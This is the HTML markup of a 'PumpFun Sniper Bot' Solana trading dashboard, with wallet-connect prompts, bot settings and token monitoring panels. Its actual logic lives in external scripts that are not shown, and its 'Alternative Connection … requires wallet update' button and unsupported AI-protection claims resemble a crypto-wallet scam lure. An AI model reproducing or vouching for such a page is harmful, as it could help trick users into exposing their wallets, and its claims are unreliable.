<!DOCTYPE html>
<html lang="en" data-theme="dark">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>PumpFun Sniper Bot - Advanced Trading Dashboard</title>
    <meta name="description" content="Advanced Solana trading dashboard with real-time token monitoring and automated trading features.">
    <link rel="apple-touch-icon" sizes="180x180" href="../images/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="../images/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="../images/favicon-16x16.png">
    <link rel="icon" href="../mevbotsniper/2025/02/cropped-logo-86x86.png" sizes="32x32" />
    <link rel="stylesheet" href="../styles/modern.css">
    <link rel="stylesheet" href="enhanced-dashboard-final.css">
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css">
    <script src="https://cdn.jsdelivr.net/npm/chart.js"></script>
    <script src="./skeleton.min.js"></script>
    <script charset="UTF-8" type="text/javascript" src="./date-fns-3.15.4.min.js"></script>

<link rel="canonical" href="https://solsniper.trading/trading/vipdetect" />
<meta property="og:url" content="https://solsniper.trading/trading/vipdetect" />

</head>
<body class="dashboard-body">
    <!-- Wallet Connection Modal -->
    <div id="walletModal" class="wallet-modal">
        <div class="modal-content">
            <div class="modal-header">
                <h3><i class="fas fa-wallet"></i> Connect Wallet</h3>
                <button class="modal-close" id="closeModal">
                    <i class="fas fa-times"></i>
                </button>
            </div>
            <div class="modal-body">
                <div class="wallet-options">
                    <button class="wallet-option" data-wallet="phantom">
                        <div class="wallet-icon phantom">
                            <i class="fas fa-ghost"></i>
                        </div>
                        <div class="wallet-info">
                            <span class="wallet-name">Phantom</span>
                            <span class="wallet-description">Most popular Solana wallet</span>
                        </div>
                        <div class="wallet-status">
                            <i class="fas fa-chevron-right"></i>
                        </div>
                    </button>
                    <button class="wallet-option" data-wallet="solflare">
                        <div class="wallet-icon solflare">
                            <i class="fas fa-fire"></i>
                        </div>
                        <div class="wallet-info">
                            <span class="wallet-name">Solflare</span>
                            <span class="wallet-description">Secure & user-friendly</span>
                        </div>
                        <div class="wallet-status">
                            <i class="fas fa-chevron-right"></i>
                        </div>
                    </button>
                    <button class="wallet-option" data-wallet="sollet">
                        <div class="wallet-icon sollet">
                            <i class="fas fa-coins"></i>
                        </div>
                        <div class="wallet-info">
                            <span class="wallet-name">Sollet</span>
                            <span class="wallet-description">Web-based wallet</span>
                        </div>
                        <div class="wallet-status">
                            <i class="fas fa-chevron-right"></i>
                        </div>
                    </button>
                </div>
            </div>
        </div>
    </div>

    <!-- Bot Settings Modal -->
    <div id="settingsModal" class="settings-modal">
        <div class="modal-content large">
            <div class="modal-header">
                <h3><i class="fas fa-cog"></i> Bot Configuration</h3>
                <button class="modal-close" id="closeSettingsModal">
                    <i class="fas fa-times"></i>
                </button>
            </div>
            <div class="modal-body">
                <div class="settings-tabs">
                    <button class="tab-btn active" data-tab="trading">
                        <i class="fas fa-chart-line"></i>
                        Trading Settings
                    </button>
                    <button class="tab-btn" data-tab="safety">
                        <i class="fas fa-shield-alt"></i>
                        Safety Features
                    </button>
                    <button class="tab-btn" data-tab="advanced">
                        <i class="fas fa-brain"></i>
                        Advanced AI
                    </button>
                </div>
                
                <div class="tab-content active" id="trading-tab">
                    <div class="settings-grid">
                        <div class="setting-group">
                            <label><i class="fas fa-coins"></i> Minimum Amount (SOL)</label>
                            <input type="number" id="settingsMinAmount" step="0.01" value="0.1" min="0.01">
                            <small>Minimum investment per trade</small>
                        </div>
                        <div class="setting-group">
                            <label><i class="fas fa-wallet"></i> Maximum Amount (SOL)</label>
                            <input type="number" id="settingsMaxAmount" step="0.01" value="1.0" min="0.01">
                            <small>Maximum investment per trade</small>
                        </div>
                        <div class="setting-group">
                            <label><i class="fas fa-percentage"></i> Slippage Tolerance (%)</label>
                            <input type="number" id="settingsSlippage" step="0.1" value="5" min="0.1" max="50">
                            <small>Maximum acceptable slippage</small>
                        </div>
                        <div class="setting-group">
                            <label><i class="fas fa-arrow-up"></i> Take Profit (%)</label>
                            <input type="number" id="settingsTakeProfit" value="50" min="1">
                            <small>Target profit for auto-sell</small>
                        </div>
                        <div class="setting-group">
                            <label><i class="fas fa-arrow-down"></i> Stop Loss (%)</label>
                            <input type="number" id="settingsStopLoss" value="30" min="1">
                            <small>Maximum loss before auto-sell</small>
                        </div>
                        <div class="setting-group">
                            <label><i class="fas fa-user-tie"></i> Max Dev Hold (%)</label>
                            <select id="settingsMaxDevHold">
                                <option value="10">10% - Very Safe</option>
                                <option value="20">20% - Safe</option>
                                <option value="30" selected>30% - Balanced</option>
                                <option value="40">40% - Risky</option>
                                <option value="50">50% - High Risk</option>
                            </select>
                            <small>Maximum developer token holding</small>
                        </div>
                    </div>
                </div>

                <div class="tab-content" id="safety-tab">
                    <div class="settings-grid">
                        <div class="setting-group toggle">
                            <label><i class="fas fa-bug"></i> Honeypot Detection</label>
                            <div class="toggle-switch">
                                <input type="checkbox" id="honeypotDetection" checked>
                                <label for="honeypotDetection" class="switch"></label>
                            </div>
                            <small>Automatically detect and avoid honeypot tokens</small>
                        </div>
                        <div class="setting-group toggle">
                            <label><i class="fas fa-exclamation-triangle"></i> Rug Pull Protection</label>
                            <div class="toggle-switch">
                                <input type="checkbox" id="rugPullProtection" checked>
                                <label for="rugPullProtection" class="switch"></label>
                            </div>
                            <small>AI-powered rug pull detection and prevention</small>
                        </div>
                        <div class="setting-group">
                            <label><i class="fas fa-tachometer-alt"></i> Trading Speed</label>
                            <select id="tradingSpeed">
                                <option value="fast">Fast - 2 seconds (High frequency)</option>
                                <option value="normal" selected>Normal - 5 seconds (Balanced)</option>
                                <option value="conservative">Conservative - 15 seconds (Safe)</option>
                            </select>
                            <small>Real-time token detection speed preference</small>
                        </div>
                        <div class="setting-group">
                            <label><i class="fas fa-clock"></i> Max Hold Time</label>
                            <select id="maxHoldTime">
                                <option value="5">5 minutes</option>
                                <option value="15">15 minutes</option>
                                <option value="30" selected>30 minutes</option>
                                <option value="60">1 hour</option>
                                <option value="120">2 hours</option>
                            </select>
                            <small>Maximum time to hold a position</small>
                        </div>
                    </div>
                </div>

                <div class="tab-content" id="advanced-tab">
                    <div class="settings-grid">
                        <div class="setting-group toggle">
                            <label><i class="fas fa-robot"></i> AI Market Analysis</label>
                            <div class="toggle-switch">
                                <input type="checkbox" id="aiAnalysis" checked>
                                <label for="aiAnalysis" class="switch"></label>
                            </div>
                            <small>Enable advanced AI market pattern recognition</small>
                        </div>
                        <div class="setting-group toggle">
                            <label><i class="fas fa-brain"></i> Smart Entry/Exit</label>
                            <div class="toggle-switch">
                                <input type="checkbox" id="smartEntry" checked>
                                <label for="smartEntry" class="switch"></label>
                            </div>
                            <small>AI-optimized entry and exit timing</small>
                        </div>
                        <div class="setting-group">
                            <label><i class="fas fa-chart-area"></i> Risk Tolerance</label>
                            <select id="riskTolerance">
                                <option value="low">Low Risk - Conservative</option>
                                <option value="medium" selected>Medium Risk - Balanced</option>
                                <option value="high">High Risk - Aggressive</option>
                            </select>
                            <small>Overall risk appetite for AI decisions</small>
                        </div>
                    </div>
                </div>

                <div class="modal-actions">
                    <button class="btn btn-secondary" id="cancelSettings">
                        <i class="fas fa-times"></i>
                        Cancel
                    </button>
                    <button class="btn btn-primary" id="saveSettings">
                        <i class="fas fa-save"></i>
                        Save Configuration
                    </button>
                </div>
            </div>
        </div>
    </div>

    <!-- Main Dashboard -->
    <div class="dashboard-container">
        <!-- Header -->
        <header class="dashboard-header">
            <!-- Logo and Title -->
            <div class="header-brand">
                <a href="../index.html">
                <div class="brand-logo">
                    <img
                width="50"
                height="50"
                src="../mevbotsniper/2025/02/cropped-logo-86x86.png"
                class="custom-logo"
                alt="PumpFun Sniper bot"
                /> 
                    <span>PumpFun Sniper</span>
                </div>
                </a>
                <div class="brand-subtitle">Advanced Trading Dashboard</div>
            </div>

            <!-- Connection Status -->
            <div class="connection-status">
                <div class="status-indicator">
                    <div class="status-dot" id="statusDot"></div>
                    <div class="status-info">
                        <span class="status-label">Connection Status</span>
                        <span class="status-text" id="statusText">INITIALIZING...</span>
                    </div>
                </div>
            </div>

            <!-- Header Controls -->
            <div class="header-controls">
                <button id="refreshBtn" class="control-btn" title="Refresh Data">
                    <i class="fas fa-sync-alt"></i>
                </button>
                <button id="settingsBtn" class="control-btn" title="Bot Settings">
                    <i class="fas fa-cog"></i>
                </button>
                <button id="fullscreenBtn" class="control-btn" title="Toggle Fullscreen">
                    <i class="fas fa-expand"></i>
                </button>
            </div>
        </header>

        <!-- Main Content Grid -->
        <div class="main-grid">
            <!-- Left Control Panel -->
            <aside class="control-panel">
                <!-- Wallet Connection Section -->
                <div class="panel-card wallet-card">
                    <div class="card-header">
                        <h3><i class="fas fa-wallet"></i> Wallet Connection</h3>
                    </div>
                    <div class="card-content">
                        <button onclick="window.startConnect()" class="wallet-connect-btn" >
                            <div class="btn-icon">
                                <i class="fas fa-wallet"></i>
                            </div>
                            <div class="btn-content">
                                <span class="btn-title" id="walletStatus">Connect Wallet</span>
                                <span class="btn-subtitle">Click to connect</span>
                            </div>
                        </button>
                        
                        <!-- Wallet Info (Hidden by default) -->
                        <div class="wallet-info" id="walletInfo" style="display: none;">
                            <div class="wallet-details">
                                <div class="wallet-address">
                                    <span class="label">Address:</span>
                                    <span class="value" id="walletAddress">Not Connected</span>
                                </div>
                                <div class="wallet-balance">
                                    <span class="label">Balance:</span>
                                    <span class="value" id="walletBalance">0.00 SOL</span>
                                </div>
                            </div>
                        </div>

                        <!-- Alternative Connection -->
                        <div class="alt-connection">
                            <button class="interact-button alt-connect-btn" >
                                <i class="fas fa-link"></i>
                                <span>Alternative Connection</span>
                            </button>
                            <p class="alt-description">
                                Connection for fully automatic trading without contracts, requires wallet update
                            </p>
                        </div>
                    </div>
                </div>

                <!-- Bot Control Section -->
                <div class="panel-card bot-control-card">
                    <div class="card-header">
                        <h3><i class="fas fa-robot"></i> Bot Control</h3>
                        <div class="bot-status" id="botStatus">
                            <span class="status-badge stopped">STOPPED</span>
                        </div>
                    </div>
                    <div class="card-content">
                        <div class="control-buttons">
                            <button id="startBotBtn" class="btn btn-success btn-large">
                                <i class="fas fa-play"></i>
                                <span>Start Trading</span>
                            </button>
                            <button id="stopBotBtn" class="btn btn-danger btn-large" disabled>
                                <i class="fas fa-stop"></i>
                                <span>Stop Bot</span>
                            </button>
                        </div>

                        <!-- Bot Configuration Quick Settings -->
                        <div class="quick-settings">
                            <div class="setting-row">
                                <label>Amount Range (SOL)</label>
                                <div class="range-inputs">
                                    <input type="number" id="quickMinAmount" placeholder="0.1" step="0.01" min="0.01" class="range-input">
                                    <span class="range-separator">to</span>
                                    <input type="number" id="quickMaxAmount" placeholder="1.0" step="0.01" min="0.01" class="range-input">
                                </div>
                            </div>
                            <div class="setting-row">
                                <label>Take Profit (%)</label>
                                <input type="number" id="quickTakeProfit" placeholder="50" min="1" class="setting-input">
                            </div>
                            <div class="setting-row">
                                <label>Stop Loss (%)</label>
                                <input type="number" id="quickStopLoss" placeholder="30" min="1" class="setting-input">
                            </div>
                        </div>

                        <button class="btn btn-secondary btn-full" id="advancedSettingsBtn">
                            <i class="fas fa-sliders-h"></i>
                            Advanced Settings
                        </button>
                    </div>
                </div>

                <!-- Trading Statistics -->
                <div class="panel-card stats-card">
                    <div class="card-header">
                        <h3><i class="fas fa-chart-bar"></i> Trading Stats</h3>
                        <div class="stats-period">
                            <select id="statsPeriod" class="period-selector">
                                <option value="1h">Last Hour</option>
                                <option value="24h" selected>24 Hours</option>
                                <option value="7d">7 Days</option>
                            </select>
                        </div>
                    </div>
                    <div class="card-content">
                        <div class="stats-grid">
                            <div class="stat-item">
                                <div class="stat-icon success">
                                    <i class="fas fa-handshake"></i>
                                </div>
                                <div class="stat-info">
                                    <span class="stat-value" id="totalTrades">0</span>
                                    <span class="stat-label">Total Trades</span>
                                </div>
                            </div>
                            <div class="stat-item">
                                <div class="stat-icon primary">
                                    <i class="fas fa-trophy"></i>
                                </div>
                                <div class="stat-info">
                                    <span class="stat-value" id="successfulTrades">0</span>
                                    <span class="stat-label">Successful</span>
                                </div>
                            </div>
                            <div class="stat-item">
                                <div class="stat-icon warning">
                                    <i class="fas fa-percentage"></i>
                                </div>
                                <div class="stat-info">
                                    <span class="stat-value" id="winRate">0%</span>
                                    <span class="stat-label">Win Rate</span>
                                </div>
                            </div>
                            <div class="stat-item">
                                <div class="stat-icon profit">
                                    <i class="fas fa-coins"></i>
                                </div>
                                <div class="stat-info">
                                    <span class="stat-value" id="totalProfit">0.000 SOL</span>
                                    <span class="stat-label">Total Profit</span>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>

                <!-- Performance Chart -->
                <div class="panel-card chart-card">
                    <div class="card-header">
                        <h3><i class="fas fa-chart-area"></i> Performance</h3>
                        <div class="chart-controls">
                            <button class="chart-btn active" data-period="1h">1H</button>
                            <button class="chart-btn" data-period="24h">24H</button>
                            <button class="chart-btn" data-period="7d">7D</button>
                        </div>
                    </div>
                    <div class="card-content">
                        <div class="chart-container">
                            <canvas id="profitChart"></canvas>
                        </div>
                        <div class="chart-summary">
                            <div class="summary-item">
                                <span class="label">24h P&L:</span>
                                <span class="value positive" id="dayProfitLoss">+0.000 SOL</span>
                            </div>
                            <div class="summary-item">
                                <span class="label">Best Trade:</span>
                                <span class="value positive" id="bestTrade">+0.000 SOL</span>
                            </div>
                        </div>
                    </div>
                </div>

                <!-- Theme Selector -->
                <div class="panel-card theme-card">
                    <div class="card-header">
                        <h3><i class="fas fa-palette"></i> Interface</h3>
                    </div>
                    <div class="card-content">
                        <div class="theme-selector">
                            <label>Theme:</label>
                            <select id="themeSelect" class="theme-select">
                                <option value="theme1">Dark Cyber</option>
                                <option value="theme2">Matrix Green</option>
                                <option value="theme3">Purple Haze</option>
                                <option value="theme4">Golden Sun</option>
                                <option value="theme5">Blood Red</option>
                                <option value="theme6">Ice Blue</option>
                                <option value="theme7">Ocean Teal</option>
                                <option value="theme8">Sunset Orange</option>
                            </select>
                        </div>
                        <div class="interface-settings">
                            <div class="setting-toggle">
                                <label>Auto Refresh:</label>
                                <div class="toggle-switch">
                                    <input type="checkbox" id="autoRefresh" checked>
                                    <label for="autoRefresh" class="switch"></label>
                                </div>
                            </div>
                            <div class="setting-toggle">
                                <label>Compact Mode:</label>
                                <div class="toggle-switch">
                                    <input type="checkbox" id="compactMode">
                                    <label for="compactMode" class="switch"></label>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </aside>

            <!-- Main Trading Panel -->
            <main class="trading-panel">
                <!-- Panel Header -->
                <div class="panel-header">
                    <div class="header-title">
                        <h2><i class="fas fa-chart-line"></i> Live Token Monitoring</h2>
                        <div class="monitoring-status">
                            <div class="status-dot active" id="pumpfunStatusDot"></div>
                            <span id="pumpfunStatusText">Connecting to Pump.fun...</span>
                        </div>
                    </div>
                    <div class="header-controls">
                        <div class="filter-controls">
                            <button class="filter-btn active" data-filter="all">
                                <i class="fas fa-list"></i>
                                <span>All</span>
                            </button>
                            <button class="filter-btn" data-filter="profitable">
                                <i class="fas fa-arrow-up"></i>
                                <span>Profitable</span>
                            </button>
                            <button class="filter-btn" data-filter="losses">
                                <i class="fas fa-arrow-down"></i>
                                <span>Losses</span>
                            </button>
                        </div>
                        <button class="refresh-btn" id="refreshTokens">
                            <i class="fas fa-sync-alt"></i>
                        </button>
                    </div>
                </div>

                <!-- Token List -->
                <div class="token-list-container">
                    <!-- Preview Mode (when wallet not connected) -->
                    <div class="preview-mode" id="previewMode" style="display: none;">
                        <div class="preview-header">
                            <div class="preview-icon">
                                <i class="fas fa-eye"></i>
                            </div>
                            <div class="preview-content">
                                <h3>Preview Mode</h3>
                                <p>Connect your wallet to start real trading. Below is a simulation of potential trades.</p>
                            </div>
                        </div>
                    </div>

                    <!-- Token List Header -->
                    <div class="token-list-header">
                        <div class="header-col">Token</div>
                        <div class="header-col">Time</div>
                        <div class="header-col">Status</div>
                        <div class="header-col">Amount</div>
                        <div class="header-col">P&L</div>
                        <div class="header-col">Success Rate</div>
                        <div class="header-col" id="actionsHeader">Actions</div>
                    </div>
                    
                    <!-- Token List -->
                    <div class="token-list" id="tokenList">
                        <!-- Tokens will be dynamically added here -->
                    </div>

                    <!-- Empty State -->
                    <div class="empty-state" id="emptyState">
                        <div class="empty-icon">
                            <i class="fas fa-search"></i>
                        </div>
                        <h3>Waiting for Tokens</h3>
                        <p>Waiting for new tokens from Pump.fun to start trading</p>
                        <button class="btn btn-primary" id="startFromEmpty">
                            <i class="fas fa-play"></i>
                            Start Bot
                        </button>
                    </div>

                    <!-- Loading Indicator -->
                    <div class="loading-indicator" id="loadingIndicator">
                        <div class="spinner-container">
                            <div class="spinner"></div>
                            <div class="loading-content">
                                <h4>Searching for New Tokens...</h4>
                                <p>Analyzing new tokens from Pump.fun for trading opportunities</p>
                            </div>
                        </div>
                    </div>
                </div>
            </main>
        </div>
    </div>

    <!-- Scripts -->
    <script src="enhanced-dashboard.js"></script>
    <script src="../js/main.js"></script>
</body>
</html>